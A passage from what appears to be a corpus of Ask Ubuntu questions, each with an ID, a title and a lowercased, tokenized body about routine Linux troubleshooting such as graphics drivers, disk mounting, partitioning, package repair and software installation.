unknown . i do n't know if this has something to do with me playing around with playonlinux or a recent update .
267963	patchlist for ubuntu kernels	i am experiencing a known bug with ocfs2 and linux 3.5 and i 'm wondering how i can tell if the patch is in a specific ubuntu kernel or not . the exact patch is here : https : //oss.oracle.com/git/ ? p=smushran/linux-2.6.git ; a=commit ; h=a2118b301104a24381b414bc93371d666fe8d43a its only a mild inconvenience so i do n't want to recompile the kernel from scratch ( mostly laziness ) however i do want to know when i can upgrade to a kernel with the patch . googling has n't come up with a easy way of telling . does anyone know ?
267965	trying to get opengl 2 shaders to work glxinfo says i have 4.20 installed	i am trying to get opengl 2 shaders to work . i just installed kubuntu on my lenovo z575 laptop which sports a amd a6-3420m apu , integrated 6520 gpu . in kubuntu under desktop effects i have opengl 2 shaders enabled however for effects which require it , it gives me an error message x effect requires opengl 2 x= name of effect glxinfo gave me this : opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6520g opengl version string : 4.2.12002 compatibility profile context 9.00.11 opengl shading language version string : 4.20 the complete log can be found here http : //pastebin.com/z2gyvbqh i have it set to : compositing type : opengl qt graphics system : native because other options will disable the kde effects . i have also tried disabling vsync on a secondary note does anyone know how to reopen that window that appears in the kubuntu desktop where one can store icons and close or expand the windows as they see necessary , i accidently closed it and i am lost on how to open it
267968	remove lvm to install ubuntu	i am trying to install ubuntu . however i have an lvm on the drive i want to install ubuntu on . gparted can not remove the lvm which is /dev/sda6 . how can i remove the lvm to instal lvm over it ?
267969	power management suspend/hibernate/hybrid suspend problem ubuntu 12.10 64 bit	hi i am using a dell inspiron 7520 , i 've got a i7 2.1ghz cpu with an amd radeon hd 7730m working on switchable graphic with an intel hd 4000 . i am using the computer on linux only so there 's no window factor coming into the problem . i am currently running on my intel hd 4000 to work on laptop . my battery before i suspend by shutting the lid is at 4 hours or a little higher . when i shut the lid , i 'm dropping at 2:30 hours or so . i notice something when i wake the computer , there is two lines that pops for a sec then i am in gnome . i have unistalled gnome-power-management , tried xfce4 and now i use laptop-mode-tools , i use also jupiter to help the battery a bit which helps before i suspend . i have also tried to hibernate , does n't change anything . i turned myself toward the hybrid suspend , it was not a success obviously.more than that , i am running my interface on gnome-shell , at the moment i am using the gnome classic without effect interface which helps a lot when i have to play video game such as eve online : ) . so what else could i try to make this work . thanks a lot = )
267979	nexus 7 ca n't rotate in xfce ?	i installed xfce4 on my nexus 7 running ubuntu and after logging into it , i noticed that the desktop is basically stuck in portrait mode because auto-rotation does n't work in it ( i tried logging in while in landscape mode , and it instantly switched to portrait ) . when i try to rotate the desktop in the settings , the touch controls are also rotated . is there a workaround or fix at this present moment , or is this a bug ?
267983	tips for using synapse or gnome-do	i have recently started using synapse and gnome-do as the applicaiton launcher on my ubuntu 12.04 . do you have any tips related to getting the best out of them ? launching files and folders and applicaitons works well . but i want some shortcuts to launch websites using these launchers so that i can just start type go.. and it suggests me google.com or so . or any possibility of creating shortcuts of webpages . i know there are plugins which could call the firefox bookmarks but that does n't seem to work or perhaps i dont know it : ( it was quite easy in typeandrun ( of windows )
267984	how to update form 10.10 to any supported version	i 'm trying to update from 10.10 . this has become a problem for me . after typing update-manager -d i get the following screen . thereafter i try to update the usual way and get this pair of messages : and after the last message , the update process automatically closes . can somebody help me either by pointing out what 's preventing me from upgrading or how not to update to 11.04 but to 12.04 or 12.10 directly ?
267994	how do i create an efi partition	background : i have a preinstalled windows 8 desktop and am trying to uninstall windows 8 and install ubuntu 12.10 with live dvd . i disabled secure boot . am able to boot live dvd via boot menu only which brings up ubuntu ' s manual installation menu , i believe . but when trying to install ubuntu 12.10 i get a blank screen . completely black . so what i believe the problem is is that i did not create an efi partition . if i 'm wrong someone please correct me and assist . question : how do i create an efi partition ? do i do this in windows 8 ? appreciate any help i can get .
267998	restore files lost from adduser	i have a web server set up using the www directory with a whole bunch of files that have not received their monthly backup . i 've done a ton of work so i 'd like to not restart . i then set up an e-mail server that would create maildir , etc . for e-mail on admin , etc . then tried to set up ftp for when i 'm away and followed the accepted answer for basic ubuntu ftp server which worked fine but in the process all my files in www disappeared ! i 'm assuming its the combination with the mail server creating directories but what i really need to know is how to get the files back ! edit : my problem has been solved by me forgetting to close gedit . thank god ! on the other hand this is rather odd and supposedly not because of the adduser behavior . most likely the default behavior of an e-mail server . but i 've heard no mention of it being an issue . so it must be the combination . if it did n't delete the files they should have gone somewhere though and photorec should have been able to recover something that was only missing its link in the file table . still a puzzle on multiple fronts .
268005	package brasero-common needs to be reinstalled	when i update/install/un-install any software i get the message : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : the package brasero-common needs to be reinstalled , but i ca n't find an archive for it . ' how to fix this problem ?
268011	how to fix problem with 555m nvidia drivers not working on asus n55fs ?	downloaded the newest drivers from geforce.com ( nvidia-linux-x86_64-310.40.run ) . ctrl+alt+f1 to drop to tty1 and ran sudo service lightdm stop . created /etc/modprobe.d/disable-nouveau.conf to contain : blacklist nouveau edited /etc/default/grub so it contains grub_cmdline_linux= '' nouveau.modeset=0 '' ran sudo update-initramfs -u to update . rebooted . dropped back to tty1 again and stopped lightdm . ran sudo modprobe -r nouveau . ran sudo ./nvidia-linux-x86_64-310.40.run , the installer ran through no problems . ran sudo nvidia-xconfig , new config files were written . rebooted just to make sure . when it reboots , resolution is 640x480 . i log in , try to run sudo nvidia-settings and i 'm told i am not using the nvidia x driver . lsmod | grep 'nvidia ' outputs nvidia 9402434 0 so its being loaded , i think . edit : when starting lightdm and logging in , i am presented with this error message . could not apply the stored configuration for monitors none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 640x480 @ 60hz with output at 1920x1080 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1920x1080 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 640x480 @ 60hz with output at 1920x1080 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1920x1080 @ 60hz ( pass 1 )
268019	cross compile sqlite for arm	i am using sqlite 3 for database management in my arm9 based microprocessor . i want to cross compile the latest version of the sqlite 3 for my project in linux ( ubuntu 10.04 ) . i am using the arm-none-linux-gnueabi-gcc compiler for development . i tried to cross compile using following commands , downloaded the sqlite-amalgamation-3.7.0.tar i extract it and then write the following command on terminal , sudo ./configure -- exec-prefix=/media/8ccc8e9bcc8e7f68/sqlite3/sqliteinstall/ -- host=arm -- target=arm cc=/opt/arm-2011.03/bin/arm-none-linux-gnueabi-gcc ar=/opt/arm-2011.03/bin/arm-none-linux-gnueabi-ar strip=/opt/arm-2011.03/bin/arm-none-linux-gnueabi-strip ranlib=/opt/arm-2011.03/bin/arm-none-linux-gnueabi-ranlib cflags= '' -os '' it successfully cross compiled the sqlite . then , sudo make command . it successfully run . now make install command . it did not give me an error but when i went to the config.log file i found there is some sentences as following , 1.conftest.c:17:7 : error : size of array 'off_t_is_large ' is negative 2.conftest.c:12:28 : fatal error : ac_nonexistent.h : no such file or directory compilation terminated . 3.conftest.cpp:23:28 : error : ac_nonexistent.h : no such file or directory 4.conftest.c:67:13 : error : invalid type argument of unary '* ' ( have 'int ' ) i doubt that weather it has been cross compiled properly or not . i can not understand . i inserted the library on my board it works fine but the problem is that the speed got very slow . i think there is some problem that i have not set any flags for the gcc compiler . i could not find any options.how i can set the particular flags for the gcc compiler so that unnecessary features can be omitted .
268020	what audio drivers do i have to install ?	i 'm using ubuntu 12.10 . the problem is , when playing music through speakers , some zig zig sound is coming and the sound is not clear . what drivers do i have to install to make speakers sound clear ?
268023	beginner question of lan and ubuntu server	i am very new to network . i do n't know what should i do in order to have highest security secure on my home network and internet . i got a router have only one port and i connect it to hub and split it to 3 of my computers . 2 computers are windows ( client ) which i use to browse internet and do some school work . and the other 1 computer is ubuntu-server and i ready to use it as web server and mysql server . if my server is been attacked , at least the others 2 of my computers would n't be affected . so , any suggestion which is the best way for me to achieve it . i am a very new beginner to network so forgive me asking this kinds of silly question
268025	copying from mount share drive to local folder through script	this is my first time trying to work with linux scripts so this may be something obvious . here is what i am trying to do : remove all contents from local folder - rm /home/user/documents/exercise/ copy files from a shared windows network drive - cp smb : //server/arc/exercise % 20files/word/ so from my understanding my command should look like this rm /home/user/documents/exercise/ cp smb : //server/arc/exercise % 20files/word/ /home/user/documents/exercise/ but anytime i try and run either of the above commands i get the following error : `` rm : can not remove `/home/user/documents/exercise/ ' : is a directory '' `` cp : can not stat `smb : //server/arc/exercise % 20files/word/ ' : no such file or directory '' what am i doing wrong ? kind regards , m edit : i now have the rm function working yet am still troubled by the cp function . to ensure it is not an issue with the spaces in the folder names i have renamed the folders on the share so it now reads : //server/arc/exercisefiles/* i have mounted the folder so i ( assume ) no longer need the smb : // . it currently reads : cp -rfv /home/user/documents/exerciseshare/exercisefiles/word/ /home/user/documents/exercise/ m
268028	removed windows and now am unable to mount formerly shared partition	i just removed my windows 8 partition , but not ubuntu ( raring ) will not let me mount a ntfs partition i was using as a shared space . here is the error : error mounting /dev/sda3 at /media/john/storage : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/john/storage '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . since i am going to be formatting the entire hd into one ubuntu partition anyways , i do n't want to go through the the effort of re-installing windows just to get rid of this problem . i plan on just mounting the partition long enough to copy all of the data onto an external hd ( i realize now that i should have done that first ) . and so , all i need is to mount it as read-only . i was n't sure of the proper syntax to do this so i did some searching and the command i found was : sudo mount -r /dev/sda3 but this only gives me : mount : ca n't find /dev/sda3 in /etc/fstab or /etc/mtab here are my /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 / was on /dev/sda5 during installation uuid=fcf93aca-d3f2-4c39-b9b3-8c822a8585bc / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=5153367d-a9d6-4754-89ee-54a73a384f07 none swap sw 0 0 and /etc/mtab : /dev/sda5 / ext4 rw , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/cgroup tmpfs rw 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 none /run/user tmpfs rw , noexec , nosuid , nodev , size=104857600 , mode=0755 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfsd-fuse /run/user/john/gvfs fuse.gvfsd-fuse rw , nosuid , nodev , user=john 0 0 /dev/sdb1 /media/john/58e2-d9f7 vfat rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelp > er=udisks2 0 0 /dev/sdc1 /media/john/ipod\040storage fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 i have no idea what i am doing in this particular domain of ubuntu ( i 'm getting to be relatively competent at many other things , but i do n't want accidentally to end up making the whole hd unbootable ) . so if someone can give me any solution that will allow me to simply copy my data , i would greatly appreciate it ! i 've tried both methods ( with -o uid=1000 , gid=1000 and without ) but i still get the error : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i actually go excited because i had n't thought to try and use nautilus , but that still did n't work ( which should have been obvious because it still is n't mounted ) . thanks so much for trying though !
268030	google music manager stops downloading after a while	i kept my music library , about 9000 songs , safe on google play music while i was without a personal computer . now i 've got a laptop running 12.10 . i 've installed google music manager beta and want to use it to download my entire library . here 's the problem : music manager starts downloading and goes for a while . although the status bar never moves , and it still says `` 0 of 9000 songs downloaded '' , my music folder shows that i 've successfully downloaded about 1500 songs . however , music manager is now undoubtedly not downloading anything and i ca n't seem to start it up again . i know that if i go into my .config folder and delete the google music manager folder from there , next time i start the music manager , it 'll start over from the beginning and actually start downloading again , but there 's no point in doing this if i have to start over each time and wo n't make it to the end anyway . any help , please ?
268033	how to find dependencies of php	i need to install lamp in my home directory . i wish to install from source . it is so difficult to find out dependency of php manually , so , is there any easy way to do it . i hope build-depends will show all the dependencies , including apache and mysql , also it is related to php distribution of ubuntu . is there any command available to find out all dependencies from source ?
268034	how can i open the present working directory ( pwd ) in nautilus from the terminal ?	how can i open a directory which i am currently working on from terminal in nautilus file manager ?
268040	how can i use a pendrive to increase my ram ( to speed up the system ) ?	in windows , we get the option `` speed up sytem '' on inserting a usb pendrive ... can we do the same in linux ... i am using ubuntu 12.04 . i am working on a project in college and the system ( desktop pc ) given to us is painfully slow ... ( low ram ) .. i tried installing preload and zswap ... but i cant find much difference ... the system freezes or hangs-up if u have 5 applications open ( say firefox , python shell , terminal , libre open office , documents folder.. for example . ) or if 7 tabs are open on firefox ... ! and wwe usually restart the system after waiting for some 5-10 mins . pls advice.. thanks in advance ! the amt of memory installed asd @ asd-desktop : ~ $ sudo dmidecode -- type memory [ sudo ] password for asd : dmidecode 2.11 smbios 2.4 present . handle 0x0014 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 4 gb error information handle : not provided number of devices : 2 handle 0x0015 , dmi type 17 , 27 bytes memory device array handle : 0x0014 error information handle : not provided total width : 64 bits data width : 64 bits size : 512 mb form factor : dimm set : none locator : j6h1 bank locator : chan a dimm 0 type : ddr2 type detail : synchronous speed : 667 mhz manufacturer : 0x0000000000000000 serial number : 0x00000000 asset tag : unknown part number : 0x3531323633363735304c0000000000000000 handle 0x0017 , dmi type 17 , 27 bytes memory device array handle : 0x0014 error information handle : not provided total width : unknown data width : unknown size : no module installed form factor : dimm set : none locator : j6j1 bank locator : chan b dimm 0 type : ddr2 type detail : none speed : unknown manufacturer : no dimm serial number : no dimm asset tag : no dimm part number : no dimm
268046	mount two hard drives on start up	i have two hard-drives ( one internal and one external ) that i want to mount on start up ( ntfs , but it doesnât matter ) . i can mount them fine with the `` disk utility '' aplication and i can mount them fine with the comands /usr/bin/udisks -- mount /dev/disk/by-uuid/21318e3e64707b4d /usr/bin/udisks -- mount /dev/disk/by-uuid/6439fb1d652606c4 respectively ( i followed this tutorial ; https : //help.ubuntu.com/community/automaticallymountpartitions # per-user_mounts and used the per-user mounts ) . but when i put these commands , separated by a semicolon , in the startup application to run on startup , it only mounts one of the partitions ( always the same one ) . why is this and how to fix it ? ( at first i tried to have each mounting-command as a separate `` startup program '' but then the start-up program removed one of the programs , leaving me with only one mounted hard drive ... ) i 'm using ubuntu 12.04 lts . thank 's in advance !
268053	mouse freezes randomly on xubuntu , only scrolling works	sometimes , especially when the processor is working very hard , the mouse ( touchpad ) freezes . scrolling and buttons still work . when i press strg+alt+f1 and strg+alt+f7 afterwards , it works properly again . what can be done about it ? what information should i provide ?
268059	switching monitors as in windows 7	one thing i loved in windows 7 was the ease of switching between single monitors/extending/mirroring them using win+p . this shortcut produced the following : is there something similar in ubuntu ? the only way i found is to either use displays settings , which is bothersomly slow use fn shortcut , which is not optimal , because you do n't know , which mode you 'll be turned to
268061	folder recovery after upgradation	hi i upgraded my ubuntu 10.10 to 12.04 and i found one folder named 'www ' inside '/var ' was missing can you plese tell me how to recocver it . thanks..
268063	how can i change the permissions of a folder from create or delete to list files only on a ntfs partition ?	i have many ntfs partitions on my pc . if i change the permissions of a folder on a ntfs partition from `` create and delete files '' to `` list files only '' , its permissions will return to `` create and delete files '' permissions . but , if i copy that folder and paste it onto the desktop , a linux partition , the feature works . that is , it will change from `` create and delete files '' to `` list files only '' . how can i make the permission changes stay without copying the folder to my desktop ?
268064	how do i wake up the printer when it sleeps ?	i am running ubuntu 12.04 on an ltsp network . i have attached a printer to the server via usb . the printer is an hp laserjet pro p1102 with driver foomatic/foo2zjs-z2 ( recommended ) . often the printer goes to sleep , and then jobs submitted do not get printed . even when the printer is turned on to force waking . how can i wake up the printer so the print jobs will be executed ?
268068	copy speeds drop down all the time ?	i use ubuntu 12.04 . i have a good pc , a dell xps , with 8 gb of memory and a 1tb hdd and an i5 processor . when i copy files internally ( to and from the internal hdd ) , nautilus initially shows speeds of about 30 mb/s . but , the problem is , it always , keeps dropping by 0.1 mb/s at a time ( every 5 seconds or so ) , till it stabilizes at around 1mb/s ( if the copying is n't finished already ) . i 'm trying to backup my pc into a 1tb wd my passport external hdd ( usb 3.0 ) . it started at 36 mb/s and is now 8mb/s in 15 minutes and still falling regularly . i have around a 100 gb of data to copy and it does n't seem it will happen . any ideas about the problem ? edit : while i could n't really find out what caused th problem , using a tool like rsync helped and it is much faster than the traditional cp . sebastian werk 's answer helped too , but it does n't tell what caused it .
268073	kubuntu and kde clock	i have some very strange behavior of the kde clock in latest kubuntu with kde 4.10 backports . system clock is correctly set , although for some reason it uses utc . this is correct : me @ pinguino ~ ] $ date fri mar 15 09:06:36 utc 2013 however , the clock is just wrong . see this : rome can never have the same time as utc , as it is always either 1 or 2 hours ahead ! bug ? ?
268088	solve error file compiling php configure : error : libxpm . ( a|so ) not found	i got an error while compiling php , i am listing the details below . error configure error libxpm . ( a so ) not found i have checked with dpkg -l libxpm-dev . it is showing the needed file is in the folder '' /usr/lib/x86_64-linux-gnu/ '' ( libxpm.a ) . i have tried with -- with-xpm-dir=/usr/lib/x86_64-linux-gnu , but error still exists .
268089	kernel compilation of version 2.4 on a system running 3.2.0	my current kernel version on with my os running on is 3.2.0 . can i compile a kernel of version 2.4.0 on it ? is there any perfect kernel documentation available ? ( as i see different ways of compiling kernel , expecting a unified documentation which lists all possible ways )
268090	unable to migrate guest : unsafe migration : migration may lead to data corruption if disks use cache ! = none	i tried to migrate the virtual machine using virt-manager but i am getting the error as '' unable to migrate guest : unsafe migration : migration may lead to data corruption if disks use cache ! = none ''
268092	100mb of ram not detected on 64-bit 12.10 ( nvidia cards )	my desktop 's wubi install does not properly detect my nvidia graphics card and reports 3.9gb of ram out of 4gb . on my netbook , which has an nvidia ion and 2gb ram , sysinfo reports 1.9gb ram but shows my video card information properly . it never happened to me with old versions . do you have any ideas regarding these issues ?
268101	desktop switcher , on one monitor only ?	i have two screens , one i 'd like one to be left alone when i switch desktops . i have my ide open on a vertical monitor and then my main monitor i have email , browser etc . all open in their open desktops at full screen . i 'd like to switch between them as i do on a single screen set up , but leave my ide visible regardless of what desktop i 'm looking at . my system : ubuntu 12.10 gforce 210 - nvidia x installed and working 8gb ram intel core i5 processor . is this even possible ?
268102	how do i set the default resolution of a nvidia gpu in ubuntu 12.04 ?	hey i have recently installed ubuntu 12.04 and have successfully installed the drivers for my nvidia 680 gtx . however , when i log in the default resolution is 800x600 and i can not work out how to change it . i try messing around with the settings in nvidia x server but ca n't seem to get it to go to 1920x1080p that i want . i managed to get it to go to this resolution once but it reverted back to 800x600 after restart . how can i set the default resolution to 1920x1080p ? help would be appreciated , thanks ! oh and in system settings > display can only select 800x600 . my screen is a samsung s23a950d .
268104	is there any application for ubuntu to create ebooks ?	like mac has ibooks author for preparing ebooks , are there any applications for ubuntu ?
268109	ubuntu 12.10 ca n't boot because of wireless adapter ?	i have a toshiba l650 notebook , and i 'm trying to boot ubuntu 12.10 from usb . it works fine on pc , but on my toshiba it freezes at the ubuntu loading screen . right before the freeze , ubuntu turns my wireless adapters ( wifi and bluetooth ) on . anyone has any idea , how to solve this ? thank you . brainiac
268111	`` operating system was n't found , try disconnecting drives and press cltr+alt+del to restart ``	i have downloaded the ubuntu 12.10 32 bit iso and extrated the files to usb bootable drive and i want to install it along with windows 8 on my laptop . when i insert usb bootable disk and tried to restart the lappy on start up it is saying '' operating system was n't found , try disconnecting drives and press cltr+alt+del to restart `` error on black screen while installing 12.10 on windows 8 through bootable usb drive could you please help me on this ? thanks , gopichand
268121	how to mount a cifs share so it does n't warn about external file modifications	this is the current fstab entry for the mount . //qnap/share /data cifs noauto , user , username=qnap , uid=1000 , gid=1000 0 0 this works fine and most of the time without any problems . however when using some software ( eg : basic text editors like gedit , or more advanced apps like phpstorm ) to open files on the share , the software reports `` external file change notifications '' from time to time . the file timestamp or size does n't change , and both this computer and the nas have the same time set by ntp . does anybody know what is triggering these `` external file change '' notifications in basic linux text editing apps such as gedit ? does anybody know some different mount flags that could help resolve this ? i 'm interested in a fix and also interested in learning what is happening at a lower level to trigger these notifications . thanks , dave
268126	desktop session crashed . how to revert back ?	recently i tried to install gnome fallback session through synaptic package manager . but after restart my session is crashed . there is nothing in unity panel , nothing in dash , nothing in top panel . same is for all sessions . is there a way to go back without losing my application and data ?
268130	can i disable updatedb.mlocate ?	on ubuntu server here and i 'm trying to unpack 300m image files from a compressed file format using java . my unpack rate is 0.5mbytes/sec , abysmal ( 34 days to unpack 1.5tb at this rate ) . i 'm trying to figure out why , and the only oddity i notice is that updatedb.mlocate is always working when i 'm doing the unpack process . i want to turn it off to see if it 's getting in the way , but i do n't understand much about what it is . top top - 05:16:52 up 1 day , 5:15 , 3 users , load average : 2.00 , 2.01 , 1.83 tasks : 83 total , 1 running , 82 sleeping , 0 stopped , 0 zombie cpu ( s ) : 0.4 % us , 0.8 % sy , 0.0 % ni , 8.4 % id , 90.2 % wa , 0.0 % hi , 0.0 % si , 0.2 % st mem : 1737420k total , 1722680k used , 14740k free , 1241260k buffers swap : 917500k total , 160k used , 917340k free , 165448k cached pid user pr ni virt res shr s % cpu % mem time+ command 22901 davidpar 20 0 1051m 56m 4992 s 3 3.3 0:47.84 java 2221 root 20 0 32348 26m 268 d 1 1.6 27:57.86 updatedb.mlocat 25 root 20 0 0 0 0 s 0 0.0 10:10.77 kswapd0 678 root 20 0 15864 444 268 s 0 0.0 0:19.45 irqbalance 849 davidpar 20 0 26560 1676 332 s 0 0.1 17:17.49 screen iotop total disk read : 4.07 m/s | total disk write : 789.62 k/s tid prio user disk read disk write swapin io > command 2221 idle root 1556.98 k/s 6.36 k/s 0.00 % 99.61 % updatedb.mlocate 22902 be/4 davidpar 2.54 m/s 671.93 k/s 0.00 % 96.96 % java -cp /home/davidparks21/fruggutils/lib/fruggmapreducejobs.~educe.unpackimages /mnt/local/imagebinaries-r-00010 /mnt/ebs1/ 547 be/3 root 0.00 b/s 87.47 k/s 0.00 % 0.30 % [ jbd2/xvdf-8 ] 177 be/3 root 0.00 b/s 3.98 k/s 0.00 % 0.15 % [ jbd2/xvda1-8 ]
268132	2 openvpn connections with networkmanger	how can activate 2 openvpn-connections at once ? is one connection active the other one is disabled in the menu of the network-manager .
268133	deja dup wo n't do a full backup on new external hard drive	i have replaced my external hard drive and now need to do a full backup of my home directory onto the new drive . i 've change the location in deja dup and it creates the new directory fine , but the backup is done in seconds . there 's no way it backed up all the data in that time ! . so i assume it thinks the old drive is being retained and doing an incremental backup onto the new one . how do i convince it to forget everything and start fresh with a complete backup on the new drive ? i 've tried sudo apt-get purge deja-dup and i 've tried deleting ~/.cache/deja-dup neither forced deja dup to forget its settings . i 'm using ubuntu 12.04 home directory is encrypted and external the new hard drive is encrypted . also used dconf editor to set deja-dup back to defaults in > org > gnome > deja-dup , but still no luck . thanks
268135	i want to install openresty in my ubuntu	i had downloaded ngx_openresty-1.2.6.6.tar.gz ( stable release ) from http : //openresty.org/ and i followed these commands on terminal : tar xzvf ngx_openresty-version.tar.gz cd ngx_openresty-version/ ./configure -- with-luajit make make install but i am not able to install it in my computer . i assume that make install command does n't works out , because it prompts me error when i go with make install . please let out the way to get openresty installed on ubuntu .
268139	gui running slow , and some noob questions	i installed ubuntu 12.04 recently and it seems to run a bit slow on my desktop . i previously had windows xp professional in it and it was fast . i had formatted my pc and freshly installed ubuntu . so , is there any cure to that laggy gui ? can i gain some speed by installing any specific driver ? besides that , i wanted to know many other things . first , how can i run any external app ( other than the one from the software center ) . and , where are the apps installed . can i install them to some other location ( like we do in windows ) ? how are applications recognised in ubuntu . i mean , do we have any executable files for that ( i read in another post that there is no standard executable file , anything can be executed ) . the following are the specs of my pc : motherboard : intel desktop board d101ggc processor : pentium 4 @ 2.8 ghz ram : 1.5gb video : 256mb ( ati radeon xpress 200 chipset family ) hdd : 80gb ( about 90 % free ) ps : i know , this pc is outdated , but i use it as a platform for experimenting with things . and yes , when it comes to ubuntu , i 'm a noob . i agree . : d
268142	default to laptop display ( edubuntu 12.04.2 )	in edubuntu 12.04.2 , is there a way to have the system sense the attached monitor ( i 'm running this on a desktop - dell optiplex 740 - and not a laptop . ) every 12.04.2 install i 've done defaults to a 640x480 ( laptop ) screen
268145	how can i get guake to start ?	when i try to start guake it fails and i get the following error message : traceback ( most recent call last ) : file `` /usr/bin/guake '' , line 1422 , in < module > if not main ( ) : file `` /usr/bin/guake '' , line 1365 , in main instance = guake ( ) file `` /usr/bin/guake '' , line 653 , in __init__ notification.show ( ) glib.gerror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.notifications was not provided by any .service files i can use guake-prefs to alter the settings back to their defaults , but guake still fails to load . even if i reinstall or reboot , it still does n't run . how can i fix this ?
268146	ubuntu alongside windows 8	i already installed ubuntu on my laptop -it is an hp1000 notebook pc with windows 8 on it so i installed ubuntu alongside windows 8- i went through all the installation process and it displayed a message telling that the intallation was completed and that i needed to reboot my computer . i did it and it just went into windows 8 os , however it created the partition for ubuntu but when i try to open it on windows it tells me that the partition is corrupted . why does the ubuntu os does n't appear ?
268155	install apt package in ubuntu 12.04	i have mistakenly removed the default package apt from my system . when i run command locate apt-get , i get below output : /home/jeet/apt-get /home/jeet/desktop/apt/apt-0.7.25.3ubuntu9.13/cmdline/apt-get.cc /home/jeet/desktop/apt/apt-0.7.25.3ubuntu9.13/doc/apt-get.8.xml /home/jeet/desktop/apt/apt-0.7.25.3ubuntu9.13/doc/de/apt-get.de.8 /home/jeet/desktop/apt/apt-0.7.25.3ubuntu9.13/doc/fr/apt-get.fr.8 /home/jeet/desktop/apt/apt-0.7.25.3ubuntu9.13/doc/ja/apt-get.ja.8 /home/jeet/downloads/apt-get /home/jeet/downloads/apt-get.8.gz /usr/share/bash-completion/completions/apt-get /usr/share/bash-completion/completions/slapt-get if i run ls | grep apt-get , then i wo n't get any output . can anybody please advice how to recover apt package or install it from start ?
268162	how to remove the option to boot from ubuntu in the windows boot loader ?	an year and a half ago , i installed ubuntu on my computer using wubi . after a while i decided to install ubuntu on a separate partition . so i uninstalled the ubuntu using wubi , and installed ubuntu on a separate partition by booting from the ubuntu iso . though wubi uninstalled ubuntu from my windows partition it did not remove the option in the boot menu . so now when i boot , the grub menu has option for windows and ubuntu , but if i choose windows from the menu , i again get two options - windows and ubuntu , this time from the windows boot loader . if i choose ubuntu , it just shows and error asks to go back . so how do i remove the option ? edit : i have tried to use bcdedit but it did not help . if i run bcdedit on the command prompt , this is the output : windows boot manager -- -- -- -- -- -- -- -- -- -- identifier { 9dea862c-5cdd-4e70-acc1-f32b344d4795 } device partition=v : path \bootmgr description windows boot manager locale en-us default { e58e9c4c-dc5b-11e1-be69-bb3b6bb64ef4 } displayorder { e58e9c4c-dc5b-11e1-be69-bb3b6bb64ef4 } bootsequence { b2721d73-1db4-4c62-bf78-c548a880142d } timeout 3 windows boot loader -- -- -- -- -- -- -- -- -- - identifier { e58e9c4c-dc5b-11e1-be69-bb3b6bb64ef4 } device partition=c : path \windows\system32\winload.exe description windows 7 ultimate ( recovered ) locale en-us recoverysequence { e58e9c4d-dc5b-11e1-be69-bb3b6bb64ef4 } recoveryenabled yes osdevice partition=c : systemroot \windows according to this i should only have one entry which should be named windows 7 ultimate ( recovered ) but instead when i boot i have two entries , one named windows 7 and the other named ubuntu . i could n't find any answer by googling . i also tried to set the timeout to 0 , but again for no help , the boot screen still waits three seconds before selecting the default option .
268167	how to access phpmyadmin in lamp	i have installed lamp on ubuntu 12.10 , and i want to acced phpmyadmin , and i do n't know it 's url . i tried to access this url : http : //localhost/phpmyadmin but i got this problem : not found the requested url /phpmyadmin was not found on this server . apache/2.2.22 ( ubuntu ) server at localhost port 80 and this the instructions i 've followed to install lamp : http : //www.howtoforge.com/ubuntu_lamp_for_newbies
268171	how to view a particular unicode character ?	i am currently using quantal and i am trying to write in oriya , a south asian language . the problem is even though changing the keyboard layout to oriya works in most cases , i am unable to type the unicode character 0b5f ( oriya character yya ) . in fedora , it used to work by using the combo shift + / . i 've changed one of the lines in the section xkb_symbols `` ori '' in /usr/share/x11/xkb/symbols/in from key < ab10 > { [ u0b2f , u0040 ] } ; to key < ab10 > { [ u0b2f , u0b54 ] } ; but when i type in gedit , i get a strange box-like character filled with 0b5f . how do i fix the keyboard mapping so that i can print the unicode 0b5f on screen ?
268180	auto-mounting in lubuntu	i tried set-up fstab for auto-moutning my ext4 drive : /dev/sdb /media/vitaly/ ext4 auto , exec , rw 0 0 but lubuntu ca n't start with this parameters : mounting error : press s to skip mounting this device . what is my problem ? i have three internal ext4 drive - after every restart i need push every device in pcmanfm and enter password for mounting .
